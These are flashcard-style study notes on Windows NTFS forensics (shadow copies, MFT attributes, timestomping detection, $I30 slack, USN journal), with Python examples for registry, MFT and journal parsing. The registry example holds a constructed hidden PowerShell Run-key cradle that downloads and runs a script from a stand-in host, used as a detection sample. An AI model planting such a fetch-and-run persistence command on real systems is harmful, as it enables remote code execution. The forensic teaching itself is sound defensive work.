Anything that works like a file system behaves this way, unless the hive is compacted or the disk is defragged/cleaned up.
How do things get removed from a PST file? (old deleted/archived email items)
When it’s COMPACTED. Compaction removes deleted items, which destroys forensic residue, but it creates its own record of having been compacted.
Privacy cleaners vs forensics
Ineffectual. They will clean out your files, but not delete them forensically; in fact their logs point out specifically what was deleted
Easy way to search for scripts someone is trying to hide in a registry key
Use Registry Explorer (or RECmd, the Zimmerman command-line tool) and search for values containing Base64 above a specific length, like 400 characters; scripts are unusually large for a value.
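The same hunt as an added example (not code from the page or from the Zimmerman tools): sweep registry values for oversized Base64 runs and decode them the way PowerShell -EncodedCommand expects (UTF-16LE), so a download cradle stashed in a Run value shows up in plain text, while a long opaque blob is flagged for review but not mistaken for a script. The hive values, including the cradle, are constructed for the example; the URL is a reserved .invalid name.

```python
import base64
import binascii
import re
import string

MIN_LEN = 400                    # real scripts dwarf normal registry strings
B64_RE = re.compile(r"[A-Za-z0-9+/]{%d,}={0,2}" % MIN_LEN)
PRINTABLE = set(string.printable)

def decode_blob(blob):
    """Try to turn a Base64 run into text.

    PowerShell -EncodedCommand payloads are UTF-16LE, so that is tried first,
    then UTF-8. Returns None when the bytes are not mostly printable text
    (an opaque binary blob that still deserves a manual look)."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    for enc in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if text and sum(c in PRINTABLE for c in text) / len(text) > 0.95:
            return text
    return None

def hunt(values):
    """values: iterable of (key_path, value_name, data) taken from a hive.
    Returns one hit per oversized Base64 run, with the decoded text if any."""
    hits = []
    for key, name, data in values:
        for m in B64_RE.finditer(data):
            hits.append({"key": key, "value": name, "length": len(m.group()),
                         "decoded": decode_blob(m.group())})
    return hits

# Constructed sample: a download cradle stored the way an attacker would, plus
# benign values that must not fire (a normal Run entry, a short token) and a
# long opaque blob that fires but does not decode to a script.
CRADLE = ("$ProgressPreference='SilentlyContinue';"
          "$u='http://example.invalid/stage2.ps1';"
          "for($i=0;$i -lt 5;$i++){"
          "try{IEX (New-Object Net.WebClient).DownloadString($u);break}"
          "catch{Start-Sleep -Seconds 30}}")
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode()

SAMPLE_VALUES = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r"C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
    (r"HKCU\Software\Vendor\Settings", "Cfg", "0123456789ABCDEF" * 32),
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Updater",
     "powershell -w hidden -enc " + ENCODED),
    (r"HKCU\Software\Vendor", "Token", base64.b64encode(b"short-opaque-token").decode()),
]

if __name__ == "__main__":
    for h in hunt(SAMPLE_VALUES):
        shown = h["decoded"] or "<binary, review manually>"
        print(h["key"], h["value"], h["length"], shown[:60])
```

The length threshold alone produces two hits here; the decode step is what separates the script (readable PowerShell) from the 512-character hex-looking blob, which happens to be valid Base64 but decodes to nothing printable. Feeding real hive data means exporting values with RECmd or Registry Explorer first; nothing here touches a live registry.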
Way to speed up cataloguing the event logs
Use KAPE’s –vss option; it looks at the live logs and each shadow copy (often 3 versions), dedups, and catalogs them.
Volume shadow copies are the equivalent of virtualization snapshots. (Point in time)
They usually overlap with each other.
Volume shadow database is usually ____ sized
about 3-5% of the hard drive.
When does volume shadow “snapshot” occur
For servers, daily
For workstations, 3-6 that cover about a week; triggered on installation of software, reboots, events
tools for working with VSS files
Convert to VHD for analysis
use iSCSI and mount it to SIFT
vshadowinfo, vshadowmount
Best O/S for doing volume shadow work
SIFT; it does a better job of ignoring permissions, seeing everything. (Windows APIs respect windows permissions)
Commands used to mount VSS in SIFT
ewfmount to expose the E01 image as a raw device, then vshadowmount to expose the shadow copies
3 steps for mounting shadow files
Attach the remote system drive (or ewfmount the image)
vshadowmount /dev/sdc2 /mnt/vss
Loop over /mnt/vss/vss* and mount every individual VSS “drive” read-only on its own Linux mount point
Why don’t we see $MFT, $EXTEND, etc.?
The O/S hides them (truly hidden). If you mount a disk image on Linux, it ignores those Microsoft rules and exposes them.
How do you see the $MFT?
Look at it on a non-Windows (Linux) machine: mount the drive for analysis and it’s there, BUT NOT EXPOSED BY the ls command?! (you have to reference it by name)
What is the $MFTMIRR on an NTFS volume? How is it different?
A backup copy of the MFT. Only contains the first 4 records.
What is the $LOGFILE on an NTFS volume?
Transactional logging file
What is the $VOLUME on an NTFS volume?
Contains the volume name, NTFS version number, and a “dirty flag”
What is the $ATTRDEF on an NTFS volume?
Contains the attribute definitions
What is the $BITMAP on an NTFS Volume?
Tracks allocations (in-use versus free) of each cluster in the volume
What is the $BOOT on an NTFS Volume?
The volume boot record (boot sector plus bootstrap code) for the NTFS volume, not the disk’s MBR
What is the $BADCLUS on an NTFS Volume?
Something that tracks bad/defective clusters so NTFS won’t use them
What is the $SECURE on an NTFS Volume?
Tracks all the security information for files on the volume (Security manifest)
What is the $EXTEND on an NTFS Volume?
A directory containing $UsnJrnl, $ObjId, $Quota, $Reparse
What does the $MFT contain on NTFS?
Metadata catalog; think of it as a Dewey Decimal Card Catalog. (where is book stored, when was it last checked out, etc)
contains data that describes files. Pointers to data layer for files, MACB times, permissions. Everything has a numeric address.
How does the MFT provide “addressing”
Shows where stuff lives on the disk; what cluster. It’s an index number. If the drive is fragmented, what fragment does the data/file live on. What’s the starting number for the volume, what’s the end number.
Each MFT entry is a fixed length ($EXTEND, $BOOT, etc.) and it’s structured how?
1024 bytes; fixed-length records, like rows in a database table.
What happens when you delete files, to their record in the $MFT?
For NTFS volumes, the record’s in-use flag is flipped, so the entry goes from “allocated” to “unallocated”.
Those entries remain intact until they’re overwritten by new entries.
How would you identify something unusual in the MFT of a Microsoft O/S?
Entries are handed out in numeric order as files are created, so files installed together (core Windows files in System32) sit in a contiguous run of entry numbers. Items added later show up as far outliers, or grouped with the non-native programs.
How does the $MFT reflect a TA adding files in two separate physical places on a disk?
By entry number. The MFT records files in the order they were created, not by disk location, so files dropped at the same time in two different directories get adjacent entry numbers, which ties related files or malware together.
What does the Linux xxd command do, and how do forensicators use it?
Creates a hex dump of a file’s contents, so you can view magic numbers and such
“When you’re trying to make sense of a binary file format, a good hex viewer or hex editor is an invaluable tool. As shown in “Ultima 1 Reverse Engineering: Decoding Savegame Files“, a typical workflow involves viewing a hex dump of the binary data, making some small change, taking a second hex dump, and comparing the differences. If you’re lucky, you might even be able to observe patterns in the data directly.”
What can you see in the hex dump of an MFT entry?
The “FILE” signature, 46 49 4c 45, where the entry starts. (Shows as FILE0 in the readout)
Can see the sequence number and the MFT entry number.
Every file in the MFT has what standard attributes?
$STANDARD_INFORMATION
$FILE_NAME (long and/or short)
$DATA
What’s in the $STANDARD_INFORMATION of a MFT entry?
Flags telling you what type of file it is (hidden, system, archive, …)
MACB times: these are the timestamps Windows displays, and the ones timestomping tools change. $FILE_NAME times are set by the kernel and much harder to touch.
ARCANE RULES OF NTFS timestamps
What is kept in the $FILE_NAME of a MFT entry?
Unicode name of the file, what folder is it found in.
MFT manipulation (timestamps) can be found by
- Using MFTECmd and its timestamp anomaly checks. Will flag $SI times with no sub-second precision, and $SI times earlier than $FN times.
- Plotting creation times against MFT entry number (entry creation order) and looking for outliers.
What does sorting the MFT by entry number (like ls -li sorted by inode) tell you on a Windows system?
It should show you a contiguous sequence of all the binaries/DLLs created at the same time (install!) and then the outliers.
What can be found in the $DATA part of the MFT?
The data runs: starting cluster and length of each extent on disk.
The resident flag tells you whether the content lives in clusters on disk (non-resident) or is stored inside the MFT entry itself (resident, for very small files).
What is Zone.Identifier with ZoneId=3?
An alternate data stream (a named $DATA attribute, Zone.Identifier) that Windows attaches to downloaded files. ZoneId=3 is the Internet zone, so it is evidence the file was downloaded from the internet.
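The MFT entry structure covered by the cards above (FILE signature, sequence and entry number, $STANDARD_INFORMATION, $FILE_NAME, $DATA and the Zone.Identifier stream) and the timestomping sequence described earlier, as one added example that is not code from the page or from MFTECmd: it builds two constructed 1024-byte FILE records, applies the update sequence fixups a real parser must undo, walks the resident attributes, and then runs the two anomaly checks the cards name ($SI times with no sub-second precision, $SI creation earlier than $FN creation). Record numbers, names and times are constructed.

```python
import struct
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)                 # FILETIME epoch
ATTR_SI, ATTR_FN, ATTR_DATA, ATTR_END = 0x10, 0x30, 0x80, 0xFFFFFFFF

def to_filetime(dt):
    d = dt - EPOCH
    return (d.days * 86400 + d.seconds) * 10_000_000 + d.microseconds * 10

def resident_attr(atype, content, name=b""):
    # Resident attribute: 24-byte header, optional UTF-16LE name, content, 8-byte aligned
    hdr = 0x18 + len(name)
    total = hdr + len(content) + (-(hdr + len(content))) % 8
    buf = bytearray(total)
    struct.pack_into("<IIBBHHH", buf, 0, atype, total, 0, len(name) // 2, 0x18, 0, 0)
    struct.pack_into("<IHBB", buf, 0x10, len(content), hdr, 0, 0)
    buf[0x18:hdr] = name
    buf[hdr:hdr + len(content)] = content
    return bytes(buf)

def build_record(recno, seq, si, fn, name, zone_id=None):
    # Constructed FILE record; si/fn = (created, modified, mft_changed, accessed) FILETIMEs
    attrs = resident_attr(ATTR_SI, struct.pack("<4Q4I", *si, 0x20, 0, 0, 0))
    fn_body = struct.pack("<Q4Q2Q2IBB", 5 | (5 << 48), *fn, 4096, 40, 0x20, 0, len(name), 3)
    attrs += resident_attr(ATTR_FN, fn_body + name.encode("utf-16-le"))
    attrs += resident_attr(ATTR_DATA, b"MZ" + b"\x00" * 38)
    if zone_id is not None:  # ADS that browsers and mail clients write on download
        attrs += resident_attr(ATTR_DATA, f"[ZoneTransfer]\r\nZoneId={zone_id}\r\n".encode(),
                               "Zone.Identifier".encode("utf-16-le"))
    attrs += struct.pack("<I", ATTR_END)
    rec = bytearray(1024)
    rec[0:4] = b"FILE"
    struct.pack_into("<HHQHHHHIIQHHI", rec, 4, 0x30, 3, 0, seq, 1, 0x38, 1,
                     0x38 + len(attrs), 1024, 0, 0, 0, recno)
    rec[0x38:0x38 + len(attrs)] = attrs
    usn = b"\x07\x00"                      # update sequence: the last 2 bytes of each
    rec[0x30:0x32] = usn                   # 512-byte sector are stashed and replaced by USN
    for i in (1, 2):
        rec[0x30 + 2 * i:0x32 + 2 * i] = rec[i * 512 - 2:i * 512]
        rec[i * 512 - 2:i * 512] = usn
    return bytes(rec)

def apply_fixups(raw):
    # Undo the update sequence array; a mismatch means a torn or corrupt record
    rec = bytearray(raw)
    usa_off, usa_count = struct.unpack_from("<HH", rec, 4)
    usn = rec[usa_off:usa_off + 2]
    for i in range(1, usa_count):
        end = i * 512 - 2
        if rec[end:end + 2] != usn:
            raise ValueError("fixup mismatch in record")
        rec[end:end + 2] = rec[usa_off + 2 * i:usa_off + 2 * i + 2]
    return rec

def parse_record(raw):
    if raw[:4] != b"FILE":
        raise ValueError("not a FILE record")
    rec = apply_fixups(raw)
    seq, _links, off, flags = struct.unpack_from("<HHHH", rec, 0x10)
    info = {"recno": struct.unpack_from("<I", rec, 0x2C)[0], "seq": seq,
            "in_use": bool(flags & 1), "is_dir": bool(flags & 2), "ads": {}}
    while off + 4 <= len(rec):
        atype = struct.unpack_from("<I", rec, off)[0]
        if atype == ATTR_END:
            break
        alen, nonres, nlen, noff = struct.unpack_from("<IBBH", rec, off + 4)
        aname = rec[off + noff:off + noff + 2 * nlen].decode("utf-16-le")
        content = b""
        if nonres == 0:                    # non-resident data runs are not followed here
            clen, coff = struct.unpack_from("<IH", rec, off + 0x10)
            content = bytes(rec[off + coff:off + coff + clen])
        if atype == ATTR_SI:
            info["si"] = dict(zip("bmca", struct.unpack_from("<4Q", content, 0)))
        elif atype == ATTR_FN:
            info["fn"] = dict(zip("bmca", struct.unpack_from("<4Q", content, 8)))
            info["name"] = content[66:66 + 2 * content[64]].decode("utf-16-le")
        elif atype == ATTR_DATA and aname:
            info["ads"][aname] = content
        off += alen
    return info

def timestomp_indicators(info):
    # MFTECmd-style checks: $SI times on an exact second (SetFileTime granularity),
    # or $SI creation earlier than the kernel-set $FN creation
    si, fn, hits = info["si"], info["fn"], []
    if any(v % 10_000_000 == 0 for v in si.values()):
        hits.append("si_zero_subsecond")
    if si["b"] < fn["b"]:
        hits.append("si_created_before_fn")
    return hits

def zone_id(info):
    # ZoneId=3 in the Zone.Identifier ADS marks an Internet-zone download
    for line in info["ads"].get("Zone.Identifier", b"").decode().splitlines():
        if line.startswith("ZoneId="):
            return int(line[7:])
    return None

# Constructed records: a normal file and one backdated by a timestomping tool
T_REAL = to_filetime(datetime(2019, 4, 5, 21, 13, 20, 123456, tzinfo=timezone.utc))
T_FAKE = to_filetime(datetime(2009, 1, 1, tzinfo=timezone.utc))
NORMAL = build_record(40012, 2, (T_REAL,) * 4, (T_REAL,) * 4, "report.docx")
STOMPED = build_record(88931, 1, (T_FAKE,) * 4, (T_REAL + 30,) * 4, "payload.exe", zone_id=3)
```

Against a real $MFT you would read the file in 1024-byte steps and feed each chunk to parse_record; records that are not in use (the in_use flag cleared) are exactly the deleted-but-not-overwritten entries the cards describe, and their $FILE_NAME still carries the name and times.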
Tool for looking at the metadata of a file on NTFS systems
istat (Sleuth Kit)
Shows the owner SID of the file, nanosecond-accuracy MACB metadata, entry number, attributes, etc.
What is the problem with file wiping?
It doesn’t wipe as much as you think: it overwrites the content of the file and scrambles the file’s own MFT entry. It does NOT, however, touch the second copy of the information, in the parent directory’s index. (The wiped entry shows as zzzzzzzz in the metadata, but the directory still holds the file name and MACB timestamps)
Where can you find the folder metadata that reveals files that may have been wiped?
$I30
The directory index; it holds the entries for current files and the residue of deleted ones. FTK Imager shows this! The slack space of a directory file will contain the file name and file metadata.
File system metadata ($MFT, journals) is another place to look.
The slack space of a directory file will contain
….the file name and file metadata for files in it.
Where are file directory metadata files stored?
Stored in an index called $I30
What are the two parts of the $MFT directory information indexed?
$I30
INDEX_ROOT: directly in the MFT
INDEX_ALLOCATION: Stored as separate index chunks for large directory listings, like System32
How are file names stored in the directory index ($I30)?
As a per-record list of file names, each carrying a copy of the file’s MACB timestamps (the $FILE_NAME attribute).
Tool that parses slack space in directory structures, and what is the output?
WISP (Windows Slack Parser)
A timeline of the entries recovered from directory slack, with MACB values of the files.
What facility in NTFS records changes to metadata?
The journals ($LogFile and the USN change journal); they can be used to identify the prior state of files. Like VSS, they are a time machine.
With VSS, this NTFS function allows us to peer back in time
The USN change journal ($UsnJrnl); can be combined with the MFT and $LogFile transactions to find files and what happened when
What two streams make up the $UsnJrnl?
Both describe changes to the volume.
$Max: metadata (maximum size, allocation delta, lowest valid USN) telling the system where the live part of the journal starts
$J: one entry for each change to a file since the journal was started (sparse; the oldest entries are dropped as it grows)
A couple of tools for parsing the UsnJrnl
MFTECmd (Zimmerman tool)
ANJP (Advanced NTFS Journal Parser)
jp (Journal Parser)
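The $J stream described above, as an added example that is not code from the page or from any of the parsers listed: it builds a constructed $J (leading sparse zeros, then USN_RECORD_V2 entries for a file being dropped, timestomped, renamed to a lookalike name and deleted), parses the records, and shows two things the $MFT alone cannot: the full history of one entry and the old name behind a rename. Reason bits follow the documented USN_RECORD_V2 values; record numbers, names and times are constructed.

```python
import struct
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
# USN_RECORD_V2 reason bits (subset) as documented for the Windows change journal
REASONS = {0x1: "DATA_OVERWRITE", 0x2: "DATA_EXTEND", 0x100: "FILE_CREATE",
           0x200: "FILE_DELETE", 0x1000: "RENAME_OLD_NAME", 0x2000: "RENAME_NEW_NAME",
           0x8000: "BASIC_INFO_CHANGE", 0x80000000: "CLOSE"}
HDR = "<IHHQQQQIIIIHH"                    # 60-byte fixed part of a V2 record

def to_filetime(dt):
    d = dt - EPOCH
    return (d.days * 86400 + d.seconds) * 10_000_000 + d.microseconds * 10

def reason_names(mask):
    return [n for bit, n in sorted(REASONS.items()) if mask & bit]

def build_usn_v2(usn, file_ref, parent_ref, ts, reason, name):
    """Constructed V2 record: 8-byte aligned, UTF-16LE name right after the header."""
    nb = name.encode("utf-16-le")
    length = 60 + len(nb)
    length += (-length) % 8
    hdr = struct.pack(HDR, length, 2, 0, file_ref, parent_ref, usn, ts, reason, 0, 0, 0x20, len(nb), 60)
    return hdr + nb + b"\x00" * (length - 60 - len(nb))

def parse_usn_journal(data):
    """Walk $J from offset 0. $J is sparse, so runs of zero bytes are skipped."""
    out, off = [], 0
    while off + 60 <= len(data):
        if data[off:off + 8] == b"\x00" * 8:
            off += 8
            continue
        (length, major, _minor, fref, pref, usn, ts, reason,
         _src, _sid, _attr, nlen, noff) = struct.unpack_from(HDR, data, off)
        if length == 0 or major != 2:     # V3/V4 records (128-bit refs) not handled here
            break
        out.append({"usn": usn,
                    "ts": EPOCH + timedelta(microseconds=ts // 10),
                    "mft": fref & 0xFFFFFFFFFFFF, "seq": fref >> 48,
                    "parent": pref & 0xFFFFFFFFFFFF,
                    "reasons": reason_names(reason),
                    "name": data[off + noff:off + noff + nlen].decode("utf-16-le")})
        off += length
    return out

def history(records, mft):
    """Everything the journal kept for one MFT entry, oldest first."""
    return [(r["usn"], r["name"], r["reasons"]) for r in records if r["mft"] == mft]

def renames(records):
    """Pair RENAME_OLD_NAME with the following RENAME_NEW_NAME for the same entry:
    the old name survives here after the $MFT only shows the new one."""
    pending, pairs = {}, []
    for r in records:
        if "RENAME_OLD_NAME" in r["reasons"]:
            pending[r["mft"]] = r["name"]
        elif "RENAME_NEW_NAME" in r["reasons"] and r["mft"] in pending:
            pairs.append((pending.pop(r["mft"]), r["name"]))
    return pairs

def build_sample_journal():
    """Constructed $J: drop, timestomp, rename to a lookalike name, delete."""
    ref, parent = 88931 | (1 << 48), 4321 | (2 << 48)
    t0 = to_filetime(datetime(2019, 4, 5, 21, 13, 50, tzinfo=timezone.utc))
    steps = [(0x100, "payload.exe"),
             (0x2 | 0x100 | 0x80000000, "payload.exe"),
             (0x8000 | 0x80000000, "payload.exe"),      # timestamps changed, no data change
             (0x1000, "payload.exe"),
             (0x2000, "svchost.exe"),
             (0x200 | 0x80000000, "svchost.exe")]
    buf = b"\x00" * 4096                                # sparse region at the start of $J
    for i, (reason, name) in enumerate(steps):
        buf += build_usn_v2(len(buf), ref, parent, t0 + i * 10_000_000, reason, name)
    return buf

SAMPLE_J = build_sample_journal()

if __name__ == "__main__":
    for usn, name, reasons in history(parse_usn_journal(SAMPLE_J), 88931):
        print(usn, name, "|".join(reasons))
```

The BASIC_INFO_CHANGE record with no accompanying data reason is the journal-side trace of timestomping: the $MFT shows the altered times, but $J still records that the attributes were changed, and when. On a real volume the stream is $Extend\$UsnJrnl:$J, extracted with the tools listed above; the USN of each record is its byte offset in the stream.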
GUI tool that parses the USNJournal, the MFT, and the $Logfile, into a consolidated view
ANJP (Advanced NTFS Journal Parser)
What does the paid version of ANJP do?
It automatically flags things like open outlook attachments, Skype downloads, disk wiper artifacts, etc. (The email attachment is hard to see anywhere else)
How to see forensically that someone opened an email attachment?
Volume Shadow or disk, MFTs, using ANJP to see the access to the file/action.
How is a file written to disk? 6 steps.
$Bitmap is scanned for a cluster to write to
$MFT record created
$Bitmap updated to show where clusters are allocated.
$I30 of parent directory is updated.
$USNJrnl updated
$logfile updated with this transaction.
What data still exists after a file is deleted in NTFS? (Sneaky spots)
- Data clusters are marked free in $Bitmap, but the content is intact until the clusters are reused
- Slack space
- The MFT record (flag cleared, otherwise intact); $LogFile/$UsnJrnl still have a record of the file
- The $FILE_NAME attribute is preserved until overwritten
- The $I30 index entry in the parent directory